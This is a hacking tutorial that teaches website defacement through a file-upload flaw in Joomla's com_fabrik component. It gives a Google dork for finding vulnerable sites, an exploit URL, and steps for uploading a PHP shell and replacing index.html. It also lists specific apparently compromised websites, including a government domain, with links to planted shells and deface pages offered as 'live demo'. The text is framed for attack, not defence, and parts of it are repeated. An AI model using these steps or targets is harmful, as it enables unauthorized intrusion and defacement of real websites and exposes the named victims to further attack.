Joomla com_fabrik Upload Vulnerability
Today, I'm going to teach you how to deface a website using Joomla com_fabrik Upload Vulnerability.
Understanding Attack Method
Joomla’s com_fabrik component gives you the power to create forms and tables that run inside Joomla without requiring knowledge of mySQL and PHP. Then feed your data into Google Maps, Charts or an AJAX based calendar.But it’s vulnerable :)
Finding Vulnerable Target
Let's get it started
Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
1.Paste the any of the dork in www.google.com. If you want to narrow down the search for .com domains or .com.au domains then just append “site:com.au” in above google dork.
Example: inurl:index.php?option=com_fabrik site:com.au (This will serach for com_fabrik vulnerability for .com.au websites)
Exploiting Target
1. Once you have the list of websites, choose any website and replace put the exploit at the back of the site.
Example:
From
To
2. Then, you’ll get something like this.
3. Now upload any file to upload such as picture.jpg or shell.php. Once your file successfully uploaded, you need to add /media/yourfilename.jpg to see your file.
Example:
4. Example of the vulnerable sites,
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1
http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
5. You also can upload your shell into the site :)
http://bluejaylodgecostarica.com/media/up.php
and deface the index.html :P
http://bluejaylodgecostarica.com/
http://bluejaylodgecostarica.com/media/up.php
and deface the index.html :P
http://bluejaylodgecostarica.com/
Live Demo :
http://www.hedmusic.co.il/media/OpIsrael-BlackCyberSecCrew.jpg
http://bluejaylodgecostarica.com/media/r4bia.html
http://bluejaylodgecostarica.com/media/r4bia.html
